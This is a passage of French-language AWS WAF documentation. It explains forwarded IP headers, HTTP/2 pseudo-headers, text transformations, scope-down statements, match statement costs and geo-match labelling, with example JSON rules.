**Adresses IP utilisées dans AWS WAF Bot Control**  
Le groupe de règles géré par Bot Control vérifie les robots à l'aide des adresses IP de AWS WAF. Si vous utilisez Bot Control et que vous avez vérifié les bots qui acheminent via un proxy ou un équilibreur de charge, vous devez les autoriser explicitement à l'aide d'une règle personnalisée. Par exemple, vous pouvez configurer une règle personnalisée de correspondance des ensembles d'adresses IP qui utilise les adresses IP transférées pour détecter et autoriser vos robots vérifiés. Vous pouvez utiliser cette règle pour personnaliser la gestion de votre bot de différentes manières. Pour plus d'informations et d'exemples, consultez [AWS WAF Contrôle des robots](waf-bot-control.md). 

**Considérations générales relatives à l'utilisation des adresses IP transférées**  
Avant d'utiliser une adresse IP transférée, prenez note des mises en garde générales suivantes : 
+ Un en-tête peut être modifié par des proxys en cours de route, et les proxys peuvent gérer l'en-tête de différentes manières. 
+ Les attaquants peuvent modifier le contenu de l'en-tête pour tenter de contourner AWS WAF les inspections. 
+ L'adresse IP contenue dans l'en-tête peut être mal formée ou non valide.
+ L'en-tête que vous spécifiez peut ne pas être présent du tout dans une demande.

**Considérations relatives à l'utilisation d'adresses IP transférées avec AWS WAF**  
La liste suivante décrit les exigences et les mises en garde relatives à l'utilisation d'adresses IP transférées dans : AWS WAF
+ Pour chaque règle, vous pouvez spécifier un en-tête pour l'adresse IP transférée. La spécification de l'en-tête ne distingue pas les majuscules et minuscules.
+ Pour les instructions de règle basées sur le taux, les instructions de portée imbriquées n'héritent pas de la configuration IP transférée. Spécifiez la configuration de chaque instruction qui utilise une adresse IP transférée. 
+ Pour la correspondance géographique, la correspondance ASN et les règles basées sur le taux, AWS WAF utilise la première adresse de l'en-tête. Par exemple, si un en-tête contient des `10.1.1.1, 127.0.0.0, 10.10.10.10` AWS WAF utilisations `10.1.1.1`
+ Pour la correspondance des ensembles d'adresses IP, vous indiquez s'il convient de faire correspondre la première, la dernière ou une adresse quelconque de l'en-tête. Si vous en spécifiez une, AWS WAF inspecte toutes les adresses de l'en-tête pour détecter une correspondance, jusqu'à 10 adresses. Si l'en-tête contient plus de 10 adresses, AWS WAF inspecte les 10 dernières. 
+ Les en-têtes contenant plusieurs adresses doivent être séparées par des virgules. Si une demande utilise un séparateur autre qu'une virgule, AWS WAF considère que les adresses IP de l'en-tête sont mal formées.
+ Si les adresses IP contenues dans l'en-tête sont mal formées ou non valides, AWS WAF indique que la requête Web correspond à la règle ou ne correspond pas, selon le comportement de secours que vous spécifiez dans la configuration IP transférée.
+ Si l'en-tête que vous spécifiez n'est pas présent dans une demande, la règle AWS WAF n'y est pas du tout appliquée. Cela signifie que AWS WAF cela n'applique pas l'action de la règle et n'applique pas le comportement de repli.
+ Une instruction de règle qui utilise un en-tête IP transféré pour l'adresse IP n'utilisera pas l'adresse IP indiquée par l'origine de la requête Web.

**Bonnes pratiques d'utilisation des adresses IP transférées avec AWS WAF**  
Lorsque vous utilisez des adresses IP transférées, suivez les bonnes pratiques suivantes : 
+ Examinez attentivement tous les états possibles de vos en-têtes de demande avant d'activer la configuration IP transférée. Il se peut que vous deviez utiliser plusieurs règles pour obtenir le comportement souhaité.
+ Pour inspecter plusieurs en-têtes IP transférés ou pour inspecter l'origine de la requête Web et un en-tête IP transféré, utilisez une règle pour chaque source d'adresse IP. 
+ Pour bloquer les requêtes Web dont l'en-tête n'est pas valide, définissez l'action de règle à bloquer et définissez le comportement de secours correspondant à la configuration IP transférée. 

**Exemple de JSON pour les adresses IP transférées**  
L'instruction de correspondance géographique suivante ne correspond que si l'`X-Forwarded-For`en-tête contient une adresse IP dont le pays d'origine est `US` : 

```
{
  "Name": "XFFTestGeo",
  "Priority": 0,
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "XFFTestGeo"
  },
  "Statement": {
    "GeoMatchStatement": {
      "CountryCodes": [
        "US"
      ],
      "ForwardedIPConfig": {
        "HeaderName": "x-forwarded-for",
        "FallbackBehavior": "MATCH"
      }
    }
  }
}
```

La règle basée sur le débit suivante agrège les demandes en fonction de la première adresse IP de l'`X-Forwarded-For`en-tête. La règle ne compte que les demandes correspondant à l'instruction de correspondance géographique imbriquée et bloque uniquement les demandes correspondant à l'instruction de correspondance géographique. L'instruction de correspondance géographique imbriquée utilise également l'`X-Forwarded-For`en-tête pour déterminer si l'adresse IP indique le pays d'origine de. `US` Si c'est le cas, ou si l'en-tête est présent mais mal formé, l'instruction geo match renvoie une correspondance. 

```
{
  "Name": "XFFTestRateGeo",
  "Priority": 0,
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "XFFTestRateGeo"
  },
  "Statement": {
    "RateBasedStatement": {
      "Limit": "100",
      "AggregateKeyType": "FORWARDED_IP",
      "ScopeDownStatement": {
        "GeoMatchStatement": {
          "CountryCodes": [
            "US"
          ],
          "ForwardedIPConfig": {
            "HeaderName": "x-forwarded-for",
            "FallbackBehavior": "MATCH"
          }
        }
      },
      "ForwardedIPConfig": {
        "HeaderName": "x-forwarded-for",
        "FallbackBehavior": "MATCH"
      }
    }
  }
}
```

# Inspection des pseudo-en-têtes HTTP/2 dans AWS WAF
<a name="waf-rule-statement-request-components-for-http2-pseudo-headers"></a>

Cette section explique comment inspecter les pseudo-en-têtes HTTP/2. AWS WAF 

Les AWS ressources protégées qui prennent en charge le trafic HTTP/2 ne transmettent pas les pseudo-en-têtes HTTP/2 à des AWS WAF fins d'inspection, mais elles fournissent le contenu des pseudo-en-têtes dans les composants de requête Web qui inspectent. AWS WAF 

Vous pouvez l'utiliser AWS WAF pour inspecter uniquement les pseudo-en-têtes répertoriés dans le tableau suivant. 


**Le contenu du pseudo en-tête HTTP/2 est mappé aux composants de la requête Web**  

| Pseudo-en-tête HTTP/2 | Composant de requête Web à inspecter | Documentation | 
| --- | --- | --- | 
|  `:method`  |  Méthode HTTP   |  [Méthode HTTP](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-http-method)  | 
|  `:authority`  |  En-tête `Host`   |  [En-tête seul](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-single-header)  [Tous les en-têtes](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-headers)  | 
|  `:path`chemin de l'URI  | chemin de l'URI  | [chemin de l'URI](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-uri-path) | 
|  `:path` query  |  Chaîne de requête  |  [Chaîne de requête](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-query-string) [Paramètre de requête unique](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-single-query-param) [Tous les paramètres de requête](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-all-query-params)  | 

# Utilisation de transformations de texte dans AWS WAF
<a name="waf-rule-statement-transformation"></a>

Cette section explique comment fournir des transformations AWS WAF à appliquer avant d'inspecter la demande.

Dans les instructions qui recherchent des modèles ou définissent des contraintes, vous pouvez fournir des transformations AWS WAF à appliquer avant d'inspecter la demande. Les transformations de texte éliminent certaines mises en forme inhabituelles que les pirates informatiques utilisent afin de contourner AWS WAF. 

Lorsque vous l'utilisez avec la sélection du composant de requête du corps de la requête JSON, AWS WAF applique vos transformations après avoir analysé et extrait les éléments à inspecter à partir du JSON. Pour de plus amples informations, veuillez consulter [corps JSON](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-json-body).

Si vous fournissez plusieurs transformations, vous définissez également l'ordre que AWS WAF doit leur appliquer. 

**WCUs**— Chaque transformation de texte vaut 10WCUs.

La documentation de la AWS WAF console et de l'API fournit également des instructions concernant ces paramètres aux emplacements suivants : 
+ **Générateur de règles** sur la console — **Transformation de texte**. Cette option est disponible lorsque vous utilisez les composants de demande. 
+ **Contenu de la déclaration d'API** — `TextTransformations`Options pour les transformations de texte

Chaque liste de transformation indique les spécifications de la console et de l'API suivies d'une description.

Base64 decode – `BASE64_DECODE`  
AWS WAF décode une chaîne codée en Base64.

Base64 decode extension – `BASE64_DECODE_EXT`  
AWS WAF décode une chaîne codée en Base64, mais utilise une implémentation indulgente qui ignore les caractères non valides. 

Command line – `CMD_LINE`  
Cette option limite les situations dans lesquelles des attaquants pourraient injecter une commande de ligne de commande du système d'exploitation et utiliser un formatage inhabituel pour masquer une partie ou la totalité de la commande.   
Utilisez cette option pour exécuter les transformations suivantes :  
+ Supprimer les caractères suivants : `\ " ' ^`
+ Supprimer les espaces avant les caractères suivants : `/ (`
+ Remplacer les caractères suivants par un espace : `, ;`
+ Remplacer plusieurs espaces par un espace
+ Convertir les lettres majuscules `A-Z`, en minuscules, `a-z`

Compress whitespace – `COMPRESS_WHITE_SPACE`  
AWS WAF compresse les espaces blancs en remplaçant plusieurs espaces par un espace et en remplaçant les caractères suivants par un espace (ASCII 32) :  
+ Formfeed (ASCII 12)
+ Onglet (ASCII 9)
+ Nouvelle ligne (ASCII 10)
+ Retour en calèche (ASCII 13)
+ Onglet vertical (ASCII 11)
+ Espace ininterrompu (ASCII 160)

CSS decode – `CSS_DECODE`  
AWS WAF décode les caractères codés à l'aide des règles d'échappement CSS 2.x. `syndata.html#characters` Cette fonction utilise jusqu'à deux octets dans le processus de décodage. Elle peut donc contribuer à découvrir les caractères ASCII qui ont été codés à l'aide d'un codage CSS et qui ne serait généralement pas codés. Elle est également utile pour contrer l'évasion, qui est une combinaison d'une barre oblique inversée et de caractères non hexadécimaux. Par exemple, `ja\vascript` ou `javascript`.

Escape sequences decode – `ESCAPE_SEQ_DECODE`  
AWS WAF décode les séquences d'échappement ANSI C suivantes :`\a`,,`\b`,`\f`,`\n`,`\r`,`\t`,`\v`, `\\` `\?``\'`, `\xHH` (hexadécimal)`\"`, `\0OOO` (octal). Les encodages qui ne sont pas valides restent dans la sortie.

Hex decode – `HEX_DECODE`  
AWS WAF décode une chaîne de caractères hexadécimaux en binaire.

HTML entity decode – `HTML_ENTITY_DECODE`  
AWS WAF remplace les caractères représentés au format hexadécimal `&#xhhhh;` ou au format décimal `&#nnnn;` par les caractères correspondants.  
AWS WAF remplace les caractères codés HTML suivants par des caractères non codés. Cette liste utilise un codage HTML en minuscules, mais le traitement ne fait pas la distinction majuscules/minuscules, par exemple, `&QuOt;` et est traitée de la `&quot;` même manière.       
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/waf-rule-statement-transformation.html)

JS decode – `JS_DECODE`  
AWS WAF décode les séquences JavaScript d'échappement. Si un `\uHHHH` code se situe dans la plage de code ASCII pleine largeur de`FF01-FF5E`, l'octet le plus élevé est utilisé pour détecter et ajuster l'octet inférieur. Dans le cas contraire, seul l'octet inférieur est utilisé et l'octet supérieur est mis à zéro, ce qui peut entraîner une perte d'informations.

Lowercase – `LOWERCASE`  
AWS WAF convertit les lettres majuscules (A-Z) en minuscules (a-z).

MD5 – `MD5`  
AWS WAF calcule un MD5 hachage à partir des données de l'entrée. Le hachage calculé est au format binaire brut.

None – `NONE`  
AWS WAF inspecte la demande Web telle qu'elle a été reçue, sans aucune transformation de texte. 

Normalize path – `NORMALIZE_PATH`  
AWS WAF normalise la chaîne d'entrée en supprimant les barres obliques multiples, les références automatiques de répertoire et les références arrières de répertoire qui ne se trouvent pas au début de l'entrée.

Normalize path Windows – `NORMALIZE_PATH_WIN`  
AWS WAF convertit les barres obliques inverses en barres obliques directes, puis traite la chaîne résultante à l'aide de la transformation. `NORMALIZE_PATH`

Remove nulls – `REMOVE_NULLS`  
AWS WAF supprime tous les `NULL` octets de l'entrée. 

Replace comments – `REPLACE_COMMENTS`  
AWS WAF remplace chaque occurrence d'un commentaire de style C (/\$1... \$1/) par un seul espace. Il ne compresse pas plusieurs occurrences consécutives. Il remplace les commentaires non terminés par un espace (ASCII 0x20). Cela ne change rien à la fin autonome d'un commentaire (\$1/).

Replace nulls – `REPLACE_NULLS`  
AWS WAF remplace chaque `NULL` octet de l'entrée par le caractère espace (ASCII 0x20).

SQL hex decode – `SQL_HEX_DECODE`  
AWS WAF décode les données hexadécimales SQL. Par exemple, AWS WAF décode (`0x414243`) vers (`ABC`).

URL decode – `URL_DECODE`  
AWS WAF décode une valeur codée en URL.

URL decode Unicode – `URL_DECODE_UNI`  
Comme`URL_DECODE`, mais avec le support du codage spécifique à Microsoft. `%u` Si le code se trouve dans la plage de codes ASCII dans toute sa largeur de `FF01-FF5E`, l'octet supérieur est utilisé pour détecter et ajuster l'octet inférieur. Sinon, seul l'octet inférieur est utilisé et l'octet supérieur est mis à zéro.

UTF8 to Unicode – `UTF8_TO_UNICODE`  
AWS WAF convertit toutes les séquences de caractères UTF-8 en Unicode. Cela permet de normaliser la saisie et de minimiser les faux positifs et les faux négatifs pour les langues autres que l'anglais.

# Utilisation d'instructions scope-down dans AWS WAF
<a name="waf-rule-scope-down-statements"></a>

Cette section explique ce qu'est une instruction scope-down et comment elle fonctionne.

Une instruction scope-down est une déclaration de règle imbriquable que vous ajoutez dans une déclaration de groupe de règles géré ou une instruction basée sur le taux afin de limiter l'ensemble de demandes évaluées par la règle correspondante. La règle contenante évalue uniquement les demandes qui correspondent en premier lieu à l'instruction scope-down. 
+ **Déclaration de groupe de règles géré** : si vous ajoutez une instruction de portée réduite à une déclaration de groupe de règles géré, toute demande ne AWS WAF correspondant pas à l'instruction de portée réduite est considérée comme ne correspondant pas au groupe de règles. Seules les demandes correspondant à l'instruction scope-down sont évaluées par rapport au groupe de règles. Pour les groupes de règles gérés dont la tarification est basée sur le nombre de demandes évaluées, les instructions de délimitation peuvent aider à contenir les coûts. 

  Pour plus d'informations sur les instructions de groupes de règles gérés, consultez[Utilisation des instructions de groupes de règles gérés dans AWS WAF](waf-rule-statement-type-managed-rule-group.md).
+ Déclaration de **règle basée sur le taux — Une déclaration** de règle basée sur le taux sans indication de portée vers le bas limite toutes les demandes évaluées par la règle. Si vous souhaitez uniquement contrôler le taux pour une catégorie spécifique de demandes, ajoutez une instruction de portée réduite à la règle basée sur le taux. Par exemple, pour suivre et contrôler uniquement le taux de demandes provenant d'une zone géographique spécifique, vous pouvez spécifier cette zone géographique dans une déclaration de correspondance géographique et l'ajouter à votre règle basée sur les taux en tant que déclaration de délimitation. 

  Pour plus d'informations sur les instructions de règles basées sur les taux, consultez[Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md).

Vous pouvez utiliser n'importe quelle règle imbriquable dans une instruction scope-down. Pour les relevés disponibles, voir [Utilisation des instructions de règles de correspondance dans AWS WAF](waf-rule-statements-match.md) et[Utilisation d'instructions de règles logiques dans AWS WAF](waf-rule-statements-logical.md). Les WCUs instructions for a scope-down sont WCUs obligatoires pour l'instruction de règle que vous y définissez. Il n'y a aucun coût supplémentaire pour l'utilisation d'une déclaration de portée réduite.

Vous pouvez configurer une instruction scope-down de la même manière que lorsque vous utilisez l'instruction dans une règle normale. Par exemple, vous pouvez appliquer des transformations de texte à un composant de requête Web que vous inspectez et vous pouvez spécifier une adresse IP transférée à utiliser comme adresse IP. Ces configurations s'appliquent uniquement à l'instruction scope-down et ne sont pas héritées par le groupe de règles géré ou l'instruction de règle basée sur le taux qui les contient. 

Par exemple, si vous appliquez des transformations de texte à une chaîne de requête dans votre instruction scope-down, l'instruction scope-down inspecte la chaîne de requête après avoir appliqué les transformations. Si la demande répond aux critères de l'instruction scope-down, AWS WAF elle transmet la demande Web à la règle conteneur dans son état d'origine, sans les transformations de l'instruction scope-down. La règle qui contient l'instruction scope-down peut appliquer ses propres transformations de texte, mais elle n'hérite aucune de l'instruction scope-down. 

Vous ne pouvez pas utiliser une instruction scope-down pour spécifier une configuration d'inspection des demandes pour l'instruction de règle qui la contient. Vous ne pouvez pas utiliser une instruction scope-down comme préprocesseur de requête Web pour l'instruction de règle qui la contient. Le seul rôle d'une instruction scope-down est de déterminer quelles demandes sont transmises à l'instruction de règle la contenant pour inspection. 

# Référencement d'entités réutilisables dans AWS WAF
<a name="waf-rule-statement-reusable-entities"></a>

Cette section explique le fonctionnement des entités réutilisables dans AWS WAF.

Certaines règles utilisent des entités réutilisables et gérées en dehors de votre site WebACLs, soit par vous AWS, soit par un AWS Marketplace vendeur. Lorsque l'entité réutilisable est mise à jour, AWS WAF propage la mise à jour à votre règle. Par exemple, si vous utilisez un groupe de règles AWS gérées dans un pack de protection (ACL Web), lors de la AWS mise à jour du groupe de règles, la modification AWS est transmise à votre ACL Web afin de mettre à jour son comportement. Si vous utilisez une instruction IP set dans une règle, lorsque vous mettez à jour l'ensemble, la modification est AWS WAF répercutée sur toutes les règles qui y font référence, de sorte que tous les packs de protection (Web ACLs) utilisant ces règles sont conservés up-to-date avec vos modifications. 

Voici les entités réutilisables que vous pouvez utiliser dans une instruction de règle. 
+ **Ensembles d'adresses IP** — Vous créez et gérez vos propres ensembles d'adresses IP. Sur la console, vous pouvez y accéder à partir du volet de navigation. Pour de plus amples informations sur la gestion des jeux d'adresses IP, reportez-vous à la section [Ensembles d'adresses IP et ensembles de modèles regex dans AWS WAF](waf-referenced-set-managing.md). 
+ **Sets de matchs regex** — Vous créez et gérez vos propres sets de matchs regex. Sur la console, vous pouvez y accéder à partir du volet de navigation. Pour de plus amples informations sur la gestion des ensembles de modèles regex, reportez-vous à la section [Ensembles d'adresses IP et ensembles de modèles regex dans AWS WAF](waf-referenced-set-managing.md). 
+ **AWS Groupes de règles gérées** : AWS gère ces groupes de règles. Sur la console, vous pouvez les utiliser lorsque vous ajoutez un groupe de règles géré à votre pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md).
+ **AWS Marketplace groupes de règles gérés** : AWS Marketplace les vendeurs gèrent ces groupes de règles et vous pouvez vous y abonner pour les utiliser. Pour gérer vos abonnements, dans le volet de navigation de la console, sélectionnez **AWS Marketplace**. Les groupes de règles AWS Marketplace gérés sont répertoriés lorsque vous ajoutez un groupe de règles géré à votre pack de protection (ACL Web). Pour les groupes de règles auxquels vous n'êtes pas encore abonné, vous trouverez également un lien vers AWS Marketplace ces groupes sur cette page. Pour plus d'informations sur les groupes de règles gérés par le AWS Marketplace vendeur, consultez[AWS Marketplace groupes de règles](marketplace-rule-groups.md).
+ **Vos propres groupes de règles** : vous gérez vos propres groupes de règles, généralement lorsque vous avez besoin d'un comportement qui n'est pas disponible dans les groupes de règles gérés. Sur la console, vous pouvez y accéder à partir du volet de navigation. Pour de plus amples informations, veuillez consulter [Gestion de vos propres groupes de règles](waf-user-created-rule-groups.md).

**Suppression d'un jeu ou d'un groupe de règles référencé**  
Lorsque vous supprimez une entité référencée AWS WAF , vérifiez si elle est actuellement utilisée dans un pack de protection (ACL Web). S'il AWS WAF découvre qu'il est en cours d'utilisation, il vous avertit. AWS WAF est presque toujours capable de déterminer si une entité est référencée par un pack de protection (ACL Web). Cependant, dans de rares cas, il pourrait ne pas être en mesure de le faire. Si vous devez vous assurer que l'entité que vous souhaitez supprimer n'est pas en cours d'utilisation, vérifiez-la sur votre site Web ACLs avant de la supprimer.

# Utilisation des instructions de règles de correspondance dans AWS WAF
<a name="waf-rule-statements-match"></a>

Cette section explique ce qu'est une déclaration de match et comment elle fonctionne.

Les instructions Match comparent la demande Web ou son origine aux critères que vous fournissez. Pour de nombreuses instructions de ce type, AWS WAF compare un composant spécifique de la demande de contenu correspondant. 

Les relevés de match sont imbriquables. Vous pouvez imbriquer n'importe laquelle de ces instructions dans des instructions de règles logiques et vous pouvez les utiliser dans des instructions de portée réduite. Pour plus d'informations sur les instructions de règles logiques, consultez[Utilisation d'instructions de règles logiques dans AWS WAF](waf-rule-statements-logical.md). Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)

Ce tableau décrit les instructions de correspondance régulières que vous pouvez ajouter à une règle et fournit des directives pour calculer l'utilisation des unités de capacité (WCU) du pack de protection (ACL Web) pour chacune d'elles. Pour plus d'informations sur WCUs, voir[Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md). 


| Déclaration de correspondance | Description | WCUs | 
| --- | --- | --- | 
| [Correspondance géographique](waf-rule-statement-type-geo-match.md) | Inspecte le pays d'origine de la demande et applique des étiquettes pour le pays et la région d'origine.  | 1 | 
|  [ASN match](waf-rule-statement-type-asn-match.md)  |  Inspecte la demande par rapport à un ASN associé aux adresses IP et aux plages d'adresses.  |  1  | 
|  [Correspondance d'ensemble d'adresses IP](waf-rule-statement-type-ipset-match.md)  |  Inspecte la demande par rapport à un ensemble d'adresses IP et de plages d'adresses.   |  1 dans la plupart des cas. Si vous configurez l'instruction pour utiliser un en-tête avec des adresses IP transférées et que vous spécifiez une position dans l'en-tête deAny, augmentez la WCUs valeur de 4.  | 
|  [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md)  |  Inspecte la demande pour les étiquettes qui ont été ajoutées par d'autres règles dans le même pack de protection (ACL Web).  |  1   | 
| [Déclaration de règle de correspondance Regex](waf-rule-statement-type-regex-match.md) | Compare un modèle de regex avec un composant de requête spécifié.  | 3, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.  | 
|  [Ensemble de modèles Regex](waf-rule-statement-type-regex-pattern-set-match.md)  |  Compare les modèles regex à un composant de requête spécifié.   |  25 par jeu de modèles, comme coût de base.  Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.  | 
| [Contrainte de taille](waf-rule-statement-type-size-constraint-match.md) | Vérifie les contraintes de taille par rapport à un composant de demande spécifié.  | 1, comme coût de base.  Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.  | 
| [SQLiattaque](waf-rule-statement-type-sqli-match.md) | Inspecte la présence de code SQL malveillant dans un composant de requête spécifié.  | 20, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs. | 
| [Correspondance de chaîne](waf-rule-statement-type-string-match.md) | Compare une chaîne à un composant de demande spécifié.  |  Le coût de base dépend du type de correspondance de chaîne et se situe entre 1 et 10. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs.  | 
| [Attaque par scripts XSS](waf-rule-statement-type-xss-match.md) | Inspecte les attaques de script intersite dans un composant de demande spécifié.  | 40, comme coût de base. Si vous utilisez le composant de **requête Tous les paramètres de requête**, ajoutez 10 WCUs. Si vous utilisez le **corps JSON** du composant de requête, doublez le coût de base WCUs. Pour chaque **transformation de texte** que vous appliquez, ajoutez 10 WCUs. | 

# Instruction de correspondance géographique de règle
<a name="waf-rule-statement-type-geo-match"></a>

Cette section explique ce qu'est une déclaration de correspondance géographique et comment elle fonctionne.

Utilisez des déclarations géographiques ou de correspondance géographique pour gérer les demandes Web en fonction du pays et de la région d'origine. Une déclaration de correspondance géographique ajoute aux requêtes Web des étiquettes indiquant le pays d'origine et la région d'origine. Il ajoute ces étiquettes, que les critères de l'énoncé correspondent ou non à la demande. Une instruction Geo Match effectue également une correspondance avec le pays d'origine de la demande.

## Comment utiliser la déclaration Geo Match
<a name="waf-rule-statement-geo-how-to-use"></a>

Vous pouvez utiliser l'instruction Geo Match pour faire correspondre un pays ou une région, comme suit : 
+ **Pays** — Vous pouvez utiliser une règle de correspondance géographique à elle seule pour gérer les demandes uniquement en fonction de leur pays d'origine. L'énoncé de règle correspond aux codes de pays. Vous pouvez également suivre une règle de correspondance géographique avec une règle de correspondance d'étiquette qui correspond à l'étiquette du pays d'origine. 
**Note**  
Pour filtrer le trafic en provenance de Hong Kong, utilisez le code de pays ISO 3166-1 alpha-2 `HK` dans votre relevé de correspondance géographique.
+ **Région** : utilisez une règle de correspondance géographique suivie d'une règle de correspondance d'étiquettes pour gérer les demandes en fonction de leur région d'origine. Vous ne pouvez pas utiliser une règle de correspondance géographique uniquement pour établir une correspondance avec des codes de région.

Pour plus d'informations sur l'utilisation des règles de correspondance des étiquettes, reportez-vous aux [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md) sections et[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

## Comment fonctionne la déclaration Geo Match
<a name="waf-rule-statement-geo-how-it-works"></a>

Avec l'instruction geo match, AWS WAF gère chaque requête Web comme suit : 

1. **Détermine les codes de pays et de région de la demande** : AWS WAF détermine le pays et la région d'une demande en fonction de son adresse IP. Par défaut, AWS WAF utilise l'adresse IP d'origine de la requête Web. Vous pouvez demander d' AWS WAF utiliser une adresse IP provenant d'un autre en-tête de demande`X-Forwarded-For`, par exemple en activant la configuration IP transférée dans les paramètres de l'instruction de règle. 

   AWS WAF détermine l'emplacement des demandes à l'aide des bases de MaxMind données GeoIP. MaxMind fait état d'une très grande précision de ses données au niveau des pays, bien que la précision varie en fonction de facteurs tels que le pays et le type de propriété intellectuelle. Pour plus d'informations MaxMind, consultez la section [Géolocalisation MaxMind IP](https://support.maxmind.com/hc/en-us/sections/4407519834267-IP-Geolocation). Si vous pensez que l'une des données GeoIP est incorrecte, vous pouvez envoyer une demande de correction à Maxmind à l'adresse [MaxMind Correct](https://support.maxmind.com/hc/en-us/articles/4408252036123-GeoIP-Correction) Geo Data. IP2 

   AWS WAF utilise les codes de pays et de région alpha-2 de la norme 3166 de l'Organisation internationale de normalisation (ISO). Vous pouvez trouver les codes aux endroits suivants :
   + Sur le site Web de l'ISO, vous pouvez rechercher les codes de pays sur la [plateforme de navigation en ligne ISO (OBP).](https://www.iso.org/obp/ui#home) 
   + Sur Wikipédia, les codes de pays sont répertoriés [selon la norme ISO 3166-2](https://en.wikipedia.org/wiki/ISO_3166-2).

     Les codes régionaux d'un pays sont répertoriés dans l'URL`https://en.wikipedia.org/wiki/ISO_3166-2:<ISO country code>`. [Par exemple, les régions des États-Unis d'Amérique sont conformes à la norme ISO 3166-2:US et celles de l'Ukraine [à la norme ISO](https://en.wikipedia.org/wiki/ISO_3166-2:US) 3166-2:UA.](https://en.wikipedia.org/wiki/ISO_3166-2:UA)

1. **Détermine le libellé du pays et le libellé de la région à ajouter à la demande** : les étiquettes indiquent si l'instruction Geo Match utilise l'adresse IP d'origine ou une configuration IP transférée.
   + **IP d'origine** 

     L'étiquette du pays est`awswaf:clientip:geo:country:<ISO country code>`. Exemple pour les États-Unis d'Amérique `awswaf:clientip:geo:country:US` :

     L'étiquette de la région est`awswaf:clientip:geo:region:<ISO country code>-<ISO region code>`. Exemple pour l'Oregon aux États-Unis d'Amérique `awswaf:clientip:geo:region:US-OR` :
   + **IP transférée** 

     L'étiquette du pays est`awswaf:forwardedip:geo:country:<ISO country code>`. Exemple pour les États-Unis d'Amérique `awswaf:forwardedip:geo:country:US` :

     L'étiquette de la région est`awswaf:forwardedip:geo:region:<ISO country code>-<ISO region code>`. Exemple pour l'Oregon aux États-Unis d'Amérique `awswaf:forwardedip:geo:region:US-OR` :

   Si le code de pays ou de région n'est pas disponible pour l'adresse IP spécifiée dans une demande, AWS WAF `XX` utilisez-le dans les libellés, à la place de la valeur. Par exemple, l'étiquette suivante est pour une adresse IP client dont le code de pays n'est pas disponible : `awswaf:clientip:geo:country:XX` et l'étiquette suivante est pour une adresse IP transférée dont le pays est les États-Unis d'Amérique, mais dont le code de région n'est pas disponible :. `awswaf:forwardedip:geo:region:US-XX` 

1. **Évalue le code de pays de la demande par rapport aux critères de la règle** 

L'instruction Geo Match ajoute des libellés de pays et de régions à toutes les demandes qu'elle inspecte, qu'elle trouve ou non une correspondance. 

**Note**  
AWS WAF ajoute des libellés à la fin de l'évaluation des requêtes Web d'une règle. Pour cette raison, toute étiquette que vous utilisez par rapport aux libellés d'une instruction de correspondance géographique doit être définie dans une règle distincte de celle qui contient l'instruction de correspondance géographique. 

Si vous souhaitez inspecter uniquement les valeurs des régions, vous pouvez écrire une règle de correspondance géographique avec une Count action et une seule correspondance de code de pays, suivie d'une règle de correspondance d'étiquettes pour les étiquettes de région. Vous devez fournir un code de pays pour que la règle de correspondance géographique puisse être évaluée, même pour cette approche. Vous pouvez réduire les statistiques de journalisation et de comptage en spécifiant un pays qui est très peu susceptible d'être une source de trafic vers votre site. 

## CloudFront les distributions et la CloudFront fonction de restriction géographique
<a name="cloudfront-distributions-geo-restriction"></a>

Pour les CloudFront distributions, si vous utilisez la fonctionnalité CloudFront de restriction géographique, sachez que cette fonctionnalité ne transmet pas les demandes bloquées à AWS WAF. Il transmet les demandes autorisées à AWS WAF. Si vous souhaitez bloquer les demandes en fonction de la géographie et d'autres critères que vous pouvez spécifier AWS WAF, utilisez l'instruction AWS WAF de correspondance géographique et n'utilisez pas la fonctionnalité CloudFront de restriction géographique. 

## Caractéristiques de l'énoncé des règles
<a name="geo-match-statement-characteristics"></a>

**Imbriquable** : vous pouvez imbriquer ce type de déclaration. 

**WCUs **— 1 ECU

**Paramètres** — Cette instruction utilise les paramètres suivants : 
